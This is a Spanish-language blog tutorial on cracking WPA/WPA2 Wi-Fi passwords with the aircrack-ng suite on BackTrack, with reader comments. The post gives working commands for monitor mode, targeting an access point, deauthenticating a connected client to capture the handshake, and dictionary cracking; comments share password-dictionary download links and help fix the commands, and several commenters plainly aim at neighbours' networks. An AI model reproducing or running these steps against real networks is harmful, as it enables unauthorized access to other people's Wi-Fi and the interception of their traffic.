Tutorial: Como Crackear WPA/WPA2

Bueno, esta tutorial me basare para los que ya saben crackear una wep, así que no me molestare en explicar como crackear una wep en este tutorial. Quedo aclarar que el distro que use no fue nada menos que backtrack.

Empecemos...

1.- checamos cual es nuestra interfase para poderlo en modo monitor:

airmon-ng



2.- como sabemos ponemos nuestra interface en modo monitor:
airmon-ng start



3.- ahora miramos que AP tenemos.

airodump-ng



4.- Como miramos hay una red llamada VIRUS, en este caso que es la mira, y así que atacamos.

airodump-ng --bssid 02:C0:CA:1A:0A:6D -w lir -c 6



5.- Como nos damos cuenta hay un cliente conectado, porque lo mas importante para poder sacar un WPA/WPA2 es que necesitamos que haya alguien conectado, así que hacemos lo siguiente.

aireplay-ng -0 30 -a 02:C0:CA:1A:0A:6D -h 00:1F:3A:55:5A:3A

La mas efectiva es esta:

aireplay-ng -0 30 -a 02:C0:CA:1A:0A:6D -c 00:1F:3A:55:5A:3A




Aclaro devera de hacer este paso devera salir en la ventana de airodump esto; WPA handshake.



6.- Después sacamos la clave.

aircrack-ng -w /root/Diccionarios/Diccionario.dic lir-01.cap

Aclaro que -w ahi va el directorio de tu diccionario.



Ahora si quieres usar el diccionario que tiene el aircrack.ng, ponemos lo siguiente:

aircrack-ng -w password.lst lir-01.cap

7.- ya con todo esto, debemos esperar en sacar la clave, aclaro que este proceso es muy lento y que puede duras días, semanas etc, así que lo único que recomiendo es que tengan un buen diccionario, para poder sacar la clave.

También si alguien tiene buenos diccionarios me gustaria que lo compartieran, para poder usarlo y mirar que tal funcionan.
Posted on 21:42 by LIR and filed under | 40 Comments »

40 comentarios:

usuarioubuntu dijo... @ 29 de enero de 2010, 17:26

Hola buenas estupendo tutorial, ya consegui el handshake pero me quede atrancado con el comando:
aircrack-ng -w password.lst lir-01.cap

resultado:
cloosing first network as terget.
Opening lir-01.cap
please spesify a dictiorary (option -w)

usuarioubuntu dijo... @ 29 de enero de 2010, 17:28

Gracias.........

K@limer kcaH dijo... @ 30 de enero de 2010, 10:19

Creo que es por el formato en el que estan las password en el diccionario revisalo seguro que estan los pass segidos por EJ.

123123,aaabbb,223223

y los pas tienen que estar asi

123123
aaabbb
223223

el valenciá dijo... @ 2 de febrero de 2010, 3:44

bueno quien me ayuda a crackear wpa que no se asocien esque a mi no me se asocian de ninguna manera joo pero a ver si algien me ayuda o si ubiera de otra forma de crackear las redes

achrafaha dijo... @ 7 de marzo de 2010, 15:51

la verdad es que tengo uno buenisimo que pesa al rededor de 2 gigas "descompremido claro" y tiene mas de 227 millones de palabras "a las claves me refiero"

aki esta--->http://rs735.rapidshare.com/files/255519603/227million--mega_dic.rar



_espero ke el link funcione para siemre xD cuidense

novato dijo... @ 12 de marzo de 2010, 2:56

Buen tuto
Mi duda es, despues de optener el handshake soy incapaz de dar la ruta de mi diccionario a aircrack. Importante decir que tengo el backtrack 4 montado en un pendrive y el diccionario en window para ser mas preciso en el escritorio y es un archivo .lst
Porfa me puedes ayudar a encontrar una solucion se lo agradeceria mucho, ah soy novato en estos temas.

666ryuk666 dijo... @ 4 de mayo de 2010, 0:49
Este comentario ha sido eliminado por el autor.
gas dijo... @ 4 de mayo de 2010, 9:42

este tio os esta tomando el pelo. todos dicen lo que hacer para sacar handshake pero a la hora del diccionario o os trolan diciendo que os bajeis un buen diccionario o os dicen que viene con el programa y en realidad o no viene o viene pero muy malo. Nadie dice como crear un puto diccionario y se que se puede porque tengo un amigo que tiene un hermano que los crear y tarda unos segundos en descifrar la clave

Javier dijo... @ 4 de mayo de 2010, 16:46

por favor alguien que sepa usar bien el backtrack, el 4 especificamente, quisiera que me digan como montar el diccionario, como poner el comando en la shell para que empieze a buscar, ya me baje el diccionario "world.lst" lo tengo en el escritorio del windows vista, busco el directorio con el Konqueror pero no lo halla, ya intentè todo, porfavor AYUDENME! respondan porfavor T_T

ZaThu dijo... @ 8 de mayo de 2010, 11:44

una duda.. dde donde saco un diccionario?

Jorge Fabrizzio dijo... @ 16 de mayo de 2010, 0:10

pregunta, si la clave del tipo no esta en el diccionario no la va a sacar?

rodrigo dijo... @ 28 de mayo de 2010, 7:00

Hola como se pone la ruta de un diccionario .lst baje uno de 2 gigas y lo tengo en el disco C: pero no me acepta la ruta o lo hago mal
me podrias explicar porfavor

Rodolfo dijo... @ 17 de junio de 2010, 14:59

pon el diccionario en /root/

lucanero dijo... @ 30 de junio de 2010, 6:40

como pongo el diccionario en root?? gracias.

the society dijo... @ 5 de julio de 2010, 19:50

es mas facil escrivir spoonwep en el back track 3

sergio dijo... @ 30 de julio de 2010, 10:52

no es ninguna tomadura de pelo,solo que lleva su tiempo aprender a manejarlo.
por cierto, a alguien le pasa que despues de hacer todos los pasos el pc esta buscando claves y a los 100000 se apaga solo??alguna solucion?'
gracias

S Y K R A Y O dijo... @ 15 de agosto de 2010, 16:39

diccionario dentro del directorio donde esta el aircrack

S Y K R A Y O dijo... @ 15 de agosto de 2010, 17:01

paso otro enlace para diccionario 149.8 MB seguro que sacais el passw.

http://www.4shared.com/file/eYBOhgHC/password_bt4.html


Por cierto si alguien tiene manual o tuto de las herramientas de backtrack 4 -r1 seria favor de colgar el enlace GRACIAS.

elton dijo... @ 24 de septiembre de 2010, 13:42

Congrat
really a great tutorial
I`m using BT3 too, but when I arrive at the first aircrack comand ( aircrack-ng -w /root/Diccionarios/Diccionario.dic lir-01.cap )
it says that fails, no such file or directory, read 3 packets and no network found exiting....
can you help with this please?
thank you

miguel dijo... @ 10 de octubre de 2010, 20:27

Mi duda es la siguiente:Yo tengo sistema operativo windows XP y utilizo el back track 4 pero en live cd tambien tengo un generador de diccionarios....la pregunta es como llamar al diccionario desde el BT4 si el diccionario esta en el windows tengo los comandos pero no se como poner el diccionario dentro del BT4...si alguin me ayudara les diria como saltar un MICROTIP ese k te pide clave y usuario para acceder ala red...solo me falta hackear un WPA para completar mis conocimientos basico...weno gracias

S Y K R A Y O dijo... @ 10 de octubre de 2010, 21:19

miguel es sencillo escritorio/abrir dispositivos/tuunidad de disco/y donde tengas el windows/lo copias a la shell

miguel dijo... @ 11 de octubre de 2010, 9:32
Este comentario ha sido eliminado por el autor.
thesiebenburgen dijo... @ 30 de octubre de 2010, 10:36

es buen tutorial gracias desde columbia city

pepoSOFT dijo... @ 5 de noviembre de 2010, 2:29

peponaso878@gmail.com
hola, alguien save como hacerle en un lenobo de ibm intel 3945 abg, quiero hack WPA pero no me sale en handshake, sera q no puedo cuando no tiene cliente?
gracias

Ángel dijo... @ 5 de enero de 2011, 7:26

Buenas, pues escribo porque tengo un problemon, en el paso 3, se me queda un monton de tiempo escaneando, sin poder hacer nada, ni escribir el siguiente comendo ni nada. que puedo hacer? necesito ayuda por favor, soy muy novato. mi correo, si hacen el favor de responderme ahi, es: angel_briz@hotmail.com.

GRACIAS

PD: si me lo pueden explicar bien migadito, para claves de todo tipo, WEP; WPA; WPA".. etc... mejor. Muchisimas Gracias

Emilio Quiroz A. dijo... @ 18 de enero de 2011, 10:58

Me ha funcionado obtener claves WEP con Slitaz lo recomiendo, y por ahora busco claves WAP probando BT4. Si alguien requiere asesoria con lo primero con gusto os apoyo. Salu2 a la comunidad!

AIKON dijo... @ 22 de enero de 2011, 11:05

aireplay-ng -0 30 -a 02:C0:CA:1A:0A:6D -c 00:1F:3A:55:5A:3A
No entiendo este comando
Me pide especificar dispositivo

carla dijo... @ 2 de febrero de 2011, 11:38

@aikon


ponle la interfaz de la tarjeta, puede ser wlan0, eth2, eth0

para ver cual tienes escribe:

airmon-ng
y listo

radumarian17 dijo... @ 16 de abril de 2011, 2:46

amigo, yo no se como instalar el diccionario el backtrack, ya que uso ademas el back4, enseñame por favor

Osc#r dijo... @ 8 de junio de 2011, 6:20

Para los que quieren ver los archivos de Windows. Es relativamente sencillo, pero tienen que saber que "sda" es la partición de windows verán si escriben en la linea de comandos.

ls /dev/sda*

les saldrá el numero de particiones que tienen, ahora solo sería ir probando hasta que encuentren su partición, montando las mismas, hagan lo siguiente:

1.- creen un directorio en la carpeta mnt

mkdir /mnt/windows

2.- ir montando las particiones

mount /dev/sda2 /mnt/windows (por ejemplo)

3.- En caso de que no sea esa, desmonten y prueben con otra

umount /mnt/windows

Nota: Ya no es necesario crear otra carpeta, usen la misma, espero me haya explicado y a ustedes les haya servido

mauricio tellez dijo... @ 5 de diciembre de 2011, 7:46

bueno amigos soy nuevo coloco la ruta del diccionario bienn pero me sale el comando no funciona

toit2005 dijo... @ 11 de diciembre de 2011, 5:40

ya he conseguido poner el diccionario, me costo lo mas grandeLo puse en un pendrive. Es : aircrck-ng -w /media/isabel/diccionario/frases01.txt redes01.cap. siempre hay q poner /media/, luego el nombre del pendrive (isabel), luego la carpeta donde esta (diccionario) y el fichero como se llama frases01.txt, y despues el nombre que le pusimos en airodump-ng por ejemplo yo redes01.cap

toit2005 dijo... @ 11 de diciembre de 2011, 5:41

espero que os sirva, no erea tan dificil decirlo, siempre dando vueltas y rodeos, suerteeeeeeeee

chivo_metal dijo... @ 18 de febrero de 2012, 6:00

me concegui un dic. de 20 gb pero no se como subirselos para que lo chequeen

sadid montero dijo... @ 21 de junio de 2012, 7:41

QUIEN ME AYUDA CON ALGUN MANUAL O MAS ILUSTRACIONES PARA SACAR LAS CONTRASEÑAS WPA2-PSK, DONDE VIVO HAY COMO 30 SEÑALES Y TODAS CON ALTA INTENSIDAD, PERO NO HE PODIDO SACAR, QUIEN ME AYUDA, UN SALUDO DESDE BOGOTA, COLOMBIA mi email es sadidmontero@gmail.com

pipiclaud dijo... @ 17 de julio de 2012, 15:31

este diccionario es bestial 227million_megadic - descargar en 4shared. 227million_megadic está alojado en 4shared, un servicio gratuito para compartir archivos.
Read more at http://www.4shared.com/file/151697173/bc1da51c/227million_megadic.html#YZ3IP4tA71w6wTke.99

nicolas dijo... @ 21 de noviembre de 2012, 12:42

yo lo escribi asi y me funciono... pero me dice que la frase no esta en el diccionario.
esta es la forma.

aircrack-ng -a 2 -w /root/Desktop

solo asi me funciono.

nicolas dijo... @ 21 de noviembre de 2012, 12:45

bueno la forma completa es asi...

aircrack-ng -a 2 -w /root/Desktop lir-01.cap

septimo3000 dijo... @ 9 de abril de 2013, 9:54

para los que no saben como agregar el diccionario a BT4 o 5, estando ya en BT solo busquen el directorio donde esta el diccionario si es libiano arrastralo al escritorio de BT si es muy pesado arrastralo a la terminal donde aras el aircrack. te parecera algo asi '/c/doc..and sett../desktop/world.tst' al final solo le quitas los apostrofes quedara algo asi ya en terminal
aircrack-ng -w /c/doc..and sett../desktop/world.tst -s sniff-dump.cap y listo

jose F.B dijo... @ 2 de mayo de 2013, 5:10
Este comentario ha sido eliminado por el autor.

Publicar un comentario en la entrada